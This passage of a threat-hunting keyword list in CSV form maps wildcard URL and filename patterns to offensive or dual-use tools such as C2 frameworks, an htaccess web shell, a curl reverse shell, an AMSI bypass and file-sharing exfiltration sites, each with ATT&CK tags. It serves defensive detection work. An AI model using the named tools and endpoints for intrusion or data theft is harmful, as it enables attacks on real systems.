Enabling you to connect your local development environment with cloud services and share work in progress with colleagues or aid in building webhooks,T1021.003 - T1105 - T1090,TA0002 - TA0005 - TA0011,N/A,N/A,C2,https://learn.microsoft.com/en-us/azure/developer/dev-tunnels/overview,0,1,N/A,8,10,N/A,N/A,N/A,N/A -*https://*/.htaccess?c=cmd*,offensive_tool_keyword,htshells,Self contained htaccess shells and attacks,T1059 - T1059.007 - T1027 - T1027.001 - T1070.004,TA0005 - TA0011 - TA0002 - TA0003,N/A,N/A,C2,https://github.com/wireghoul/htshells,1,0,N/A,10,10,945,196,2022-02-17T00:26:23Z,2011-05-16T02:21:59Z -*https://*/.htaccess?c=uname -a*,offensive_tool_keyword,htshells,Self contained htaccess shells and attacks,T1059 - T1059.007 - T1027 - T1027.001 - T1070.004,TA0005 - TA0011 - TA0002 - TA0003,N/A,N/A,C2,https://github.com/wireghoul/htshells,1,0,N/A,10,10,945,196,2022-02-17T00:26:23Z,2011-05-16T02:21:59Z -*https://*/releases/download/*/lse.sh*,offensive_tool_keyword,linux-smart-enumeration,Linux enumeration tool for privilege escalation and discovery,T1087.004 - T1016 - T1548.001 - T1046,TA0007 - TA0004 - TA0002,N/A,N/A,Privilege Escalation,https://github.com/diego-treitos/linux-smart-enumeration,1,1,N/A,9,10,2924,535,2023-09-17T10:27:49Z,2019-02-13T11:02:21Z -*https://*Microsoft.ActiveDirectory.Management.dll*,offensive_tool_keyword,powershell,redteam technique - import the ActiveDirectory module without the need to install it on the current computer - the dll has been extracted from a Windows 10 x64 with RSAT installed,T1110.001 - T1110.003 - T1110.004,TA0006,N/A,N/A,Credential Access,https://github.com/mthcht/Purpleteam/blob/main/Simulation/Windows/ActiveDirectory/Bruteforce.ps1,1,1,N/A,N/A,1,91,6,2023-10-01T14:24:00Z,2022-12-05T12:40:02Z -*https://0.0.0.0:1337*,offensive_tool_keyword,icebreaker,Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment,T1110.001 - T1110.003 - T1059.003,TA0006 - TA0001 - 
TA0002,N/A,N/A,Credential Access,https://github.com/DanMcInerney/icebreaker,1,1,N/A,10,10,1175,168,2018-10-24T18:14:53Z,2017-12-04T03:42:28Z -*https://127.0.0.1:7443*,offensive_tool_keyword,covenant,Covenant is a collaborative .NET C2 framework for red teamers,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/cobbr/Covenant,1,1,N/A,10,10,3787,732,2023-02-21T23:55:48Z,2019-02-07T15:55:18Z -*https://127.0.0.1:7443*,offensive_tool_keyword,mythic,A collaborative multi-platform red teaming framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002,TA0002 - TA0003,N/A,N/A,C2,https://github.com/its-a-feature/Mythic,1,1,N/A,10,10,2490,383,2023-10-03T23:06:16Z,2018-07-05T02:09:59Z -*https://aka.ms/DevTunnelCliInstall*,greyware_tool_keyword,dev-tunnels,Dev tunnels allow developers to securely share local web services across the internet. Enabling you to connect your local development environment with cloud services and share work in progress with colleagues or aid in building webhooks,T1021.003 - T1105 - T1090,TA0002 - TA0005 - TA0011,N/A,N/A,C2,https://learn.microsoft.com/en-us/azure/developer/dev-tunnels/overview,0,1,N/A,8,10,N/A,N/A,N/A,N/A -*https://amsi.fail/*,offensive_tool_keyword,amsi.fail,AMSI.fail generates obfuscated PowerShell snippets that break or disable AMSI for the current process. The snippets are randomly selected from a small pool of techniques/variations before being obfuscated. 
Every snippet is obfuscated at runtime/request so that no generated output share the same signatures.,T1059.001 - T1562.001 - T1027.005,TA0002 - TA0005 - TA0008,N/A,N/A,Defense Evasion,https://amsi.fail/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*https://anonfiles.com/*/*,greyware_tool_keyword,anonfiles.com,Interesting observation on the file-sharing platform preferences derived from the negotiations chats with LockBit victims,T1567 - T1022 - T1074 - T1105,TA0011 - TA0009 - TA0010 - TA0008,N/A,N/A,Collection,https://twitter.com/mthcht/status/1660953897622544384,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*https://anymailfinder.com/search/*,greyware_tool_keyword,anymailfinder,used by attackers to find informations about a company users,T1593 - T1596 - T1213,TA0009,N/A,N/A,Reconnaissance,https://anymailfinder.com,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*https://api.anonfiles.com/upload*,greyware_tool_keyword,anonfiles.com,Interesting observation on the file-sharing platform preferences derived from the negotiations chats with LockBit victims,T1567 - T1022 - T1074 - T1105,TA0011 - TA0009 - TA0010 - TA0008,N/A,N/A,Data Exfiltration,https://twitter.com/mthcht/status/1660953897622544384,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*https://api.dropboxapi.com/*,greyware_tool_keyword,DBC2,DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.,T1105 - T1071.004 - T1102,TA0003 - TA0002 - TA0008,N/A,N/A,C2,https://github.com/Arno0x/DBC2,1,1,Dropbox API calls - Understanding your environment with the applications used and allowed will enhances the effectiveness of your hunt here,10,10,269,85,2017-10-27T07:39:02Z,2016-12-14T10:35:56Z -*https://api.hunter.io/*,greyware_tool_keyword,Hunter.io,used by attacker and pentester while gathering information. 
Hunter lets you find email addresses in seconds and connect with the people that matter for your business,T1597 - T1526 - T1087 - T1078 - T1056 - T1018 - T1016 - T1583 - T1589,TA0001 - TA0002 - TA0003 - TA0005 - TA0007 - TA0011,N/A,N/A,Information Gathering,https://hunter.io/,1,1,N/A,N/A,10,N/A,N/A,N/A,N/A -*https://api.openai.com/v1/files*,greyware_tool_keyword,ratchatpt,C2 using openAI API,T1094 - T1071.001,TA0011 - TA0002,N/A,N/A,C2,https://github.com/spartan-conseil/ratchatpt,0,1,risk of False positive,10,10,4,2,2023-06-09T12:39:00Z,2023-06-09T09:19:10Z -*https://api.telegram.org/bot*/sendMessage*,greyware_tool_keyword,TelegramRAT,Cross Platform Telegram based RAT that communicates via telegram to evade network restrictions,T1071.001 - T1105 - T1027,TA0011 - TA0005 - TA0002,N/A,N/A,C2,https://github.com/machine1337/TelegramRAT,1,1,N/A,10,10,198,35,2023-08-25T13:41:49Z,2023-06-30T10:59:55Z -*https://avred.r00ted.ch/upload*,offensive_tool_keyword,avred,Avred is being used to identify which parts of a file are identified by a Antivirus and tries to show as much possible information and context about each match.,T1562.001,TA0005,N/A,N/A,Defense Evasion,https://github.com/dobin/avred,1,1,N/A,9,2,172,19,2023-09-30T12:28:42Z,2022-05-19T12:12:34Z -*https://bashupload.com*,greyware_tool_keyword,bashupload.com,Interesting observation on the file-sharing platform preferences derived from the negotiations chats with LockBit victims,T1567 - T1022 - T1074 - T1105,TA0011 - TA0009 - TA0010 - TA0008,N/A,N/A,Data Exfiltration,https://twitter.com/mthcht/status/1660953897622544384,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*https://crackstation.net/*,offensive_tool_keyword,hack-tools,The all-in-one Red Team browser extension for Web Pentester,T1059.007 - T1505 - T1068 - T1216 - T1547.009,TA0002 - TA0001 - TA0009,N/A,N/A,Web Attacks,https://github.com/LasCC/Hack-Tools,1,1,N/A,9,10,5006,586,2023-10-03T15:40:37Z,2020-06-22T21:42:16Z -*https://curlshell:* | 
bash,offensive_tool_keyword,curlshell,reverse shell using curl,T1105 - T1059.004 - T1140,TA0011 - TA0002 - TA0007,N/A,N/A,C2,https://github.com/irsl/curlshell,1,0,N/A,10,10,269,28,2023-09-29T08:31:47Z,2023-07-13T19:38:34Z -*https://cyseclabs.com/exploits/*,offensive_tool_keyword,linux-exploit-suggester,Linux privilege escalation auditing tool,T1078 - T1068 - T1055,TA0004 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/The-Z-Labs/linux-exploit-suggester,1,1,N/A,10,10,4725,1055,2023-08-18T17:29:23Z,2016-10-06T21:55:51Z -*https://dnsdumpster.com/*,offensive_tool_keyword,dnsdumpster,dns recon & research - find & lookup dns records,T1018 - T1596.001 - T1590.002,TA0007 - TA0043,N/A,N/A,Reconnaissance,https://dnsdumpster.com/,1,1,N/A,7,10,N/A,N/A,N/A,N/A -*https://download.advanced-ip-scanner.com/download/files/*.exe*,greyware_tool_keyword,advanced-ip-scanner,The program shows all network devices. gives you access to shared folders. provides remote control of computers (via RDP and Radmin) and can even remotely switch computers off. 
It is easy to use and runs as a portable edition (abused by TA),T1595 - T1046,TA0007 - TA0011,N/A,Conti2 - Darkside/UNC24653 - Egregor4 - Hades/ Evilcorp5 - REvil6 - Ryuk/ UNC18787 - UNC24477 - UNC Iranian actor8 - Dharma9,Reconnaissance,https://www.huntandhackett.com/blog/advanced-ip-scanner-the-preferred-scanner-in-the-apt-toolbox,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*https://ffuf.io.fi*,offensive_tool_keyword,ffuf,Fast web fuzzer written in Go,T1110 - T1550,TA0006 - TA0008,N/A,N/A,Reconnaissance,https://github.com/ffuf/ffuf,1,1,N/A,N/A,10,10177,1154,2023-09-20T16:02:23Z,2018-11-08T09:25:49Z -*https://ffuf.io/FUZZ*,offensive_tool_keyword,ffuf,Fast web fuzzer written in Go,T1110 - T1550,TA0006 - TA0008,N/A,N/A,Reconnaissance,https://github.com/ffuf/ffuf,1,1,N/A,N/A,10,10177,1154,2023-09-20T16:02:23Z,2018-11-08T09:25:49Z -*https://file.io/*,greyware_tool_keyword,file.io,Interesting observation on the file-sharing platform preferences derived from the negotiations chats with LockBit victims,T1567 - T1022 - T1074 - T1105,TA0011 - TA0009 - TA0010 - TA0008,N/A,N/A,Collection,https://twitter.com/mthcht/status/1660953897622544384,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*https://file.io/?title=*,greyware_tool_keyword,file.io,Interesting observation on the file-sharing platform preferences derived from the negotiations chats with LockBit victims,T1567 - T1022 - T1074 - T1105,TA0011 - TA0009 - TA0010 - TA0008,N/A,N/A,Data Exfiltration,https://twitter.com/mthcht/status/1660953897622544384,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*https://github.com/bitsadmin/*,offensive_tool_keyword,nopowershell,NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. 
An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.,T1059 - T1086 - T1500 - T1564 - T1127 - T1027,TA0002 - TA0003 - TA0005,N/A,N/A,Defense Evasion,https://github.com/bitsadmin/nopowershell,1,1,N/A,10,10,761,126,2021-06-17T12:36:05Z,2018-11-28T21:07:51Z -*https://github-com.translate.goog/*,greyware_tool_keyword,translate.goog,accessing github through google translate (evasion) false positive risk,T1090.003,TA0005,N/A,N/A,Defense Evasion,https://*-com.translate.goog/*,0,1,N/A,1,3,N/A,N/A,N/A,N/A -*https://gitlab.com/kalilinux/*,offensive_tool_keyword,kali,Kali Linux is an open-source. Debian-based Linux distribution geared towards various information security tasks. such as Penetration Testing. Security Research. Computer Forensics and Reverse Engineering,T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213,TA0001 - TA0002 - TA0009,N/A,N/A,Exploitation OS,https://www.kali.org/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*https://hunter.io/*,greyware_tool_keyword,Hunter.io,used by attacker and pentester while gathering information. Hunter lets you find email addresses in seconds and connect with the people that matter for your business,T1597 - T1526 - T1087 - T1078 - T1056 - T1018 - T1016 - T1583 - T1589,TA0001 - TA0002 - TA0003 - TA0005 - TA0007 - TA0011,N/A,N/A,Information Gathering,https://hunter.io/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*https://ipv4.myip.wtf/text*,greyware_tool_keyword,ipv4.myip.wtf,get public ip address. Used by disctopia-c2,T1016 - T1071.001,TA0005 - TA0002,N/A,N/A,Reconnaissance,https://github.com/3ct0s/disctopia-c2/blob/main/libraries/disctopia.py,1,1,greyware_tools high risks of false positives,N/A,10,321,89,2023-09-26T12:00:16Z,2022-01-02T22:03:10Z -*https://kali.download/*,offensive_tool_keyword,kali,Kali Linux is an open-source. Debian-based Linux distribution geared towards various information security tasks. such as Penetration Testing. Security Research. 
Computer Forensics and Reverse Engineering,T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213,TA0001 - TA0002 - TA0009,N/A,N/A,Exploitation OS,https://www.kali.org/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*https://localhost:7443/*,offensive_tool_keyword,covenant,Covenant is a collaborative .NET C2 framework for red teamers,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/cobbr/Covenant,1,0,N/A,10,10,3787,732,2023-02-21T23:55:48Z,2019-02-07T15:55:18Z -*https://mastodon.be/@username_fzihfzuhfuoz/109994357971853428*,offensive_tool_keyword,REC2 ,REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.,T1105 - T1132 - T1071.001,TA0011 - TA0009 - TA0002,N/A,N/A,C2,https://github.com/g0h4n/REC2,1,1,N/A,10,10,100,9,2023-10-01T18:29:27Z,2023-09-25T20:39:59Z -*https://mastodon.be/username_fzihfzuhfuoz/109743339821428173*,offensive_tool_keyword,REC2 ,REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.,T1105 - T1132 - T1071.001,TA0011 - TA0009 - TA0002,N/A,N/A,C2,https://github.com/g0h4n/REC2,1,1,N/A,10,10,100,9,2023-10-01T18:29:27Z,2023-09-25T20:39:59Z -*https://matrix.org/_matrix/client/r0/rooms/*/send/m.room.message*,greyware_tool_keyword,goMatrixC2,C2 leveraging Matrix/Element Messaging Platform as Backend to control Implants in goLang.,T1090 - T1027 - T1071,TA0011 - TA0009 - TA0010,N/A,N/A,C2,https://github.com/n1k7l4i/goMatrixC2,1,0,N/A,10,10,0,2,2023-09-11T10:20:41Z,2023-08-31T09:36:38Z -*https://myexternalip.com/raw*,greyware_tool_keyword,myexternalip.com,return external ip address,T1046 - T1595 - T1595.001,TA0007 - TA0040,N/A,N/A,Reconnaissance,https://myexternalip.com/raw,1,1,False positives warning - used by some C2 
projects but legitimate site,1,6,N/A,N/A,N/A,N/A -*https://pastebin.com/raw/fevFJe98*,offensive_tool_keyword,DcRat,DcRat C2 A simple remote tool in C#,T1071 - T1021 - T1003,TA0011,N/A,N/A,C2,https://github.com/qwqdanchun/DcRat,1,1,N/A,10,10,817,352,2022-02-07T05:37:09Z,2021-03-12T11:00:37Z -*https://t.me/BotFather*,offensive_tool_keyword,TelegramRAT,Cross Platform Telegram based RAT that communicates via telegram to evade network restrictions,T1071.001 - T1105 - T1027,TA0011 - TA0005 - TA0002,N/A,N/A,C2,https://github.com/machine1337/TelegramRAT,1,1,N/A,10,10,198,35,2023-08-25T13:41:49Z,2023-06-30T10:59:55Z -*https://t.me/machine1337*,offensive_tool_keyword,TelegramRAT,Cross Platform Telegram based RAT that communicates via telegram to evade network restrictions,T1071.001 - T1105 - T1027,TA0011 - TA0005 - TA0002,N/A,N/A,C2,https://github.com/machine1337/TelegramRAT,1,1,N/A,10,10,198,35,2023-08-25T13:41:49Z,2023-06-30T10:59:55Z -*https://temp.sh/*/*,greyware_tool_keyword,temp.sh,Interesting observation on the file-sharing platform preferences derived from the negotiations chats with LockBit victims,T1567 - T1022 - T1074 - T1105,TA0011 - TA0009 - TA0010 - TA0008,N/A,N/A,Collection,https://twitter.com/mthcht/status/1660953897622544384,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*https://temp.sh/upload*,greyware_tool_keyword,temp.sh,Interesting observation on the file-sharing platform preferences derived from the negotiations chats with LockBit victims,T1567 - T1022 - T1074 - T1105,TA0011 - TA0009 - TA0010 - TA0008,N/A,N/A,Data Exfiltration,https://twitter.com/mthcht/status/1660953897622544384,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*https://tempsend.com/*,greyware_tool_keyword,tempsend.com,Interesting observation on the file-sharing platform preferences derived from the negotiations chats with LockBit victims,T1567 - T1022 - T1074 - T1105,TA0011 - TA0009 - TA0010 - 
TA0008,N/A,N/A,Collection,https://twitter.com/mthcht/status/1660953897622544384,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*https://tempsend.com/send*,greyware_tool_keyword,tempsend.com,Interesting observation on the file-sharing platform preferences derived from the negotiations chats with LockBit victims,T1567 - T1022 - T1074 - T1105,TA0011 - TA0009 - TA0010 - TA0008,N/A,N/A,Data Exfiltration,https://twitter.com/mthcht/status/1660953897622544384,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*https://textbin.net/raw/*,greyware_tool_keyword,textbin.net,textbin.net raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,textbin.net,1,1,greyware tool - risks of False positive !,10,10,N/A,N/A,N/A,N/A -*https://tmpfiles.org/dl/*.exe*,greyware_tool_keyword,tmpfiles.org,download of an executable files from tmpfiles.org often used by ransomware groups,T1566.002 - T1192 - T1105,TA0001 - TA0002,N/A,N/A,Collection,N/A,1,1,greyware tool - risk of false positive !,N/A,N/A,N/A,N/A,N/A,N/A -*https://transfer.sh*,greyware_tool_keyword,transfer.sh,Interesting observation on the file-sharing platform preferences derived from the negotiations chats with LockBit victims,T1567 - T1022 - T1074 - T1105,TA0011 - TA0009 - TA0010 - TA0008,N/A,N/A,Data Exfiltration,https://twitter.com/mthcht/status/1660953897622544384,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*https://transfert-my-files.com/files/*,greyware_tool_keyword,transfert-my-files.com,Interesting observation on the file-sharing platform preferences derived from the negotiations chats with LockBit victims,T1567 - T1022 - T1074 - T1105,TA0011 - TA0009 - TA0010 - TA0008,N/A,N/A,Collection,https://twitter.com/mthcht/status/1660953897622544384,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*https://transfert-my-files.com/inc/upload.php*,greyware_tool_keyword,transfert-my-files.com,Interesting 
observation on the file-sharing platform preferences derived from the negotiations chats with LockBit victims,T1567 - T1022 - T1074 - T1105,TA0011 - TA0009 - TA0010 - TA0008,N/A,N/A,Data Exfiltration,https://twitter.com/mthcht/status/1660953897622544384,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*https://we.tl/t-*,greyware_tool_keyword,wetransfer,WeTransfer is a popular file sharing service often used by malicious actors for phishing campaigns due to its legitimate reputation and widespread use even within some enterprises to share files,T1608.001 - T1566 - T1002 - T1048 - T1204,TA0001 - TA0002 - TA0010,N/A,EXOTIC LILY,Phishing,https://twitter.com/mthcht/status/1658853848323182597,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*https://web.archive.org/*https://www.kernel-exploits.com/media/*,offensive_tool_keyword,linux-exploit-suggester,Linux privilege escalation auditing tool,T1078 - T1068 - T1055,TA0004 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/The-Z-Labs/linux-exploit-suggester,1,1,N/A,10,10,4725,1055,2023-08-18T17:29:23Z,2016-10-06T21:55:51Z -*https://wetransfer.com/api/v4/transfers/*,greyware_tool_keyword,wetransfer,WeTransfer is a popular file-sharing service often used by malicious actors for phishing campaigns due to its legitimate reputation and widespread use even within some enterprises to share files,T1608.001 - T1566 - T1002 - T1048 - T1204,TA0001 - TA0002 - TA0010,N/A,EXOTIC LILY,Phishing,https://twitter.com/mthcht/status/1658853848323182597,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*https://wetransfer.com/downloads/*,greyware_tool_keyword,wetransfer,WeTransfer is a popular file-sharing service often used by malicious actors for phishing campaigns due to its legitimate reputation and widespread use even within some enterprises to share files,T1608.001 - T1566 - T1002 - T1048 - T1204,TA0001 - TA0002 - TA0010,N/A,EXOTIC 
LILY,Phishing,https://twitter.com/mthcht/status/1658853848323182597,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*https://wfuzz.readthedocs.io*,offensive_tool_keyword,wfuzz,Web application fuzzer.,T1210.001 - T1190 - T1595,TA0007 - TA0002 - TA0010,N/A,N/A,Information Gathering,https://github.com/xmendez/wfuzz,1,1,N/A,9,10,5262,1327,2023-04-29T01:41:47Z,2014-10-22T21:23:49Z -*https://www.email-format.com/d/*,greyware_tool_keyword,email-format,used by attackers to find informations about a company users,T1593 - T1596 - T1213,TA0009,N/A,N/A,Reconnaissance,https://www.email-format.com,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*https://www.myget.org/F/fireeye/api/v2*,offensive_tool_keyword,commando-vm,CommandoVM - a fully customizable Windows-based security distribution for penetration testing and red teaming.,T1059 - T1053 - T1055 - T1070,TA0002 - TA0004 - TA0008,N/A,N/A,Exploitation OS,https://github.com/mandiant/commando-vm,1,1,N/A,N/A,10,6323,1248,2023-10-03T19:02:49Z,2019-03-26T22:36:32Z -*https://www.nirsoft.net/toolsdownload/*,greyware_tool_keyword,nirsoft tools,NirSoft is a legitimate software company that develops system utilities for Windows. 
Some of its tools can be used by malicious actors to recover passwords harvest sensitive information and conduct password attacks.,T1003 - T1003.001 - T1003.002 - T1110 - T1566,TA0002 - TA0003 - TA0004 - TA0006 - TA0007 - TA0008 - TA0011,N/A,N/A,Collection,N/A,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*https://www.nirsoft.net/toolsdownload/*.exe*,greyware_tool_keyword,nirsoft tools,some of nirsoft tools can be abused by attackers to retrieve passwords ,T1003 - T1021 - T1056 - T1110 - T1212 - T1552,TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011,N/A,N/A,Credential Access,nirsoft.net,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*https://www.nirsoft.net/toolsdownload/*.zip*,greyware_tool_keyword,nirsoft tools,some of nirsoft tools can be abused by attackers to retrieve passwords ,T1003 - T1021 - T1056 - T1110 - T1212 - T1552,TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011,N/A,N/A,Credential Access,nirsoft.net,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*https://www.nirsoft.net/utils/*.exe*,greyware_tool_keyword,nirsoft tools,some of nirsoft tools can be abused by attackers to retrieve passwords ,T1003 - T1021 - T1056 - T1110 - T1212 - T1552,TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011,N/A,N/A,Credential Access,nirsoft.net,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*https://www.nirsoft.net/utils/*.zip*,greyware_tool_keyword,nirsoft tools,some of nirsoft tools can be abused by attackers to retrieve passwords ,T1003 - T1021 - T1056 - T1110 - T1212 - T1552,TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011,N/A,N/A,Credential Access,nirsoft.net,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*https://www.skymem.info/srch?q=*,greyware_tool_keyword,skymen.info,used by attackers to find informations about a company users,T1593 - T1596 - 
T1213,TA0009,N/A,N/A,Reconnaissance,https://www.skymem.info,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*https_revshell.exe*,offensive_tool_keyword,Executable_Files,Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well,T1071 - T1071.001 - T1105 - T1041 - T1102,TA0011 - TA0005 - TA0010,N/A,N/A,Exploitation tools,https://github.com/reveng007/Executable_Files,1,1,N/A,10,1,7,2,2023-09-07T08:36:28Z,2021-12-10T15:04:35Z -*httpsmuggler.jar*,offensive_tool_keyword,burpsuite,Collection of burpsuite plugins,T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574,TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,Network Exploitation tools,https://github.com/Mr-xn/BurpSuite-collections,1,1,N/A,N/A,10,2757,606,2023-08-04T13:50:07Z,2020-01-25T02:07:37Z -*https-portal*,offensive_tool_keyword,https-portal,HTTPS-PORTAL is a fully automated HTTPS server powered by Nginx. Lets Encrypt and Docker. By using it. you can run any existing web application over HTTPS. with only one extra line of configuration. The SSL certificates are obtained. and renewed from Lets Encrypt automatically.,T1042 - T1571 - T1021 - T1135,TA0002 - TA0003 - TA0004,N/A,N/A,Sniffing & Spoofing,https://github.com/SteveLTN/https-portal,1,0,N/A,N/A,10,4209,288,2023-01-29T14:55:41Z,2015-12-14T20:09:04Z -*'http-stager'*,offensive_tool_keyword,cobaltstrike,Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. 
scanners through packet inspection and malleable profile correlation,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/mgeeky/RedWarden,1,0,N/A,10,10,820,138,2022-10-07T14:05:25Z,2021-05-15T22:05:39Z -*huan.exe *.exe,offensive_tool_keyword,Huan,Huan is an encrypted PE Loader Generator that I developed for learning PE file structure and PE loading processes. It encrypts the PE file to be run with different keys each time and embeds it in a new section of the loader binary. Currently. it works on 64 bit PE files.,T1027 - T1036 - T1564 - T1003 - T1056 - T1204 - T1588 - T1620,TA0002 - TA0008 - ,N/A,N/A,Exploitation tools,https://github.com/frkngksl/Huan,1,0,N/A,N/A,6,518,103,2021-08-13T10:48:26Z,2021-05-21T08:55:02Z -*Huan.sln*,offensive_tool_keyword,Huan,Huan is an encrypted PE Loader Generator that I developed for learning PE file structure and PE loading processes. It encrypts the PE file to be run with different keys each time and embeds it in a new section of the loader binary. Currently. 
it works on 64 bit PE files.,T1027 - T1036 - T1564 - T1003 - T1056 - T1204 - T1588 - T1620,TA0002 - TA0008 - ,N/A,N/A,Exploitation tools,https://github.com/frkngksl/Huan,1,1,N/A,N/A,6,518,103,2021-08-13T10:48:26Z,2021-05-21T08:55:02Z -*Huan.vcxproj*,offensive_tool_keyword,Huan,Huan is an encrypted PE Loader Generator that I developed for learning PE file structure and PE loading processes. It encrypts the PE file to be run with different keys each time and embeds it in a new section of the loader binary. Currently. it works on 64 bit PE files.,T1027 - T1036 - T1564 - T1003 - T1056 - T1204 - T1588 - T1620,TA0002 - TA0008 - ,N/A,N/A,Exploitation tools,https://github.com/frkngksl/Huan,1,1,N/A,N/A,6,518,103,2021-08-13T10:48:26Z,2021-05-21T08:55:02Z -*HuanLoader.vcxproj*,offensive_tool_keyword,Huan,Huan is an encrypted PE Loader Generator that I developed for learning PE file structure and PE loading processes. It encrypts the PE file to be run with different keys each time and embeds it in a new section of the loader binary. Currently. it works on 64 bit PE files.,T1027 - T1036 - T1564 - T1003 - T1056 - T1204 - T1588 - T1620,TA0002 - TA0008 - ,N/A,N/A,Exploitation tools,https://github.com/frkngksl/Huan,1,1,N/A,N/A,6,518,103,2021-08-13T10:48:26Z,2021-05-21T08:55:02Z -*hub.docker.com/u/kalilinux/*,offensive_tool_keyword,kali,Kali Linux is an open-source. Debian-based Linux distribution geared towards various information security tasks. such as Penetration Testing. Security Research. 
